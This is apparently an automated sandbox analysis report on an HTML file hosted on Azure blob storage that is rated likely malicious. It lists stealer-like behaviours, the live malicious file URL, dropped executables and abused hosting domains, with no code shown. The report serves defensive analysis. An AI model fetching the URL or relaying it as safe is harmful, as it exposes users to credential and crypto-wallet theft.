Analysis Overview
Threat Level: Likely malicious
The file https://ytzp7vuu92w1j.blob.core.windows.net/ua0mskevqzgo84btqr0e/5HVFVzz1XInohuCeVgsT.html was found to be: Likely malicious.
Malicious Activity Summary
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Loads dropped DLL
Clipboard Data
Unsecured Credentials: Credentials In Files
Executes dropped EXE
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Obfuscated Files or Information: Command Obfuscation
Looks up external IP address via web service
Enumerates processes with tasklist
UPX packed file
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Detects Pyinstaller
System Network Configuration Discovery: Wi-Fi Discovery
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Gathers network information
Detects videocard installed
NTFS ADS
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Uses Volume Shadow Copy service COM API
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Checks SCSI registry key(s)
Enumerates system info in registry
Gathers system information
Views/modifies file attributes
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 07:56
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 07:56
Reported
2024-11-14 08:14
Platform
win10v2004-20241007-en
Max time kernel
1036s
Max time network
1036s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\Downloads\ValExt.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\ValExt.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ValExt.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ValExt.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ValExt.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ValExt.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ValExt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI56962\rar.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ValExt.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ValExt.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\ZoraraInjectINGAME\ZoraraUI.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ZoraraInjectINGAME\ZoraraUI.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\7-Zip\Lang\az.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\et.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\io.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ka.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\pa-in.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\co.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\sr-spl.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\tr.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ar.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\eu.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\gl.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\nl.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ext.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\id.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\zh-cn.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\si.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\7z.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ast.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\is.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\mn.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\el.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\kaa.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ps.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ro.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ru.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\th.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\en.ttt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\hr.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\License.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ga.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\lv.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\pt.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\7z.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\fr.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\History.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\af.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\cs.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\pt-br.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\bn.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\cy.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\sa.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\da.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\fy.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ms.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\descript.ion | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\bg.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\lt.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ku.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ca.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\he.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ko.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\lij.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\tt.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\va.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\vi.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\fi.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\uk.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\fur.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\pl.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\sq.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\ta.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\hu.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\mk.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\7-Zip\Lang\mng2.txt | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{23170F69-40C1-2701-2401-000001000000} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI18DD.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e591807.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e591803.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e591803.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f59c2d6185d8bf0c0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f59c2d610000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f59c2d61000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df59c2d61000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f59c2d6100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Folder\shellex\ContextMenuHandlers\7-Zip | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Directory\shellex\DragDropHandlers\7-Zip | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Version = "402718720" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files (x86)\\7-Zip\\7-zip.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000\LanguageFiles = "Complete" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\96F071321C0410720000000040000000\96F071321C0410724210000010000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000\Program = "Complete" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList | C:\Windows\system32\msiexec.exe | N/A |
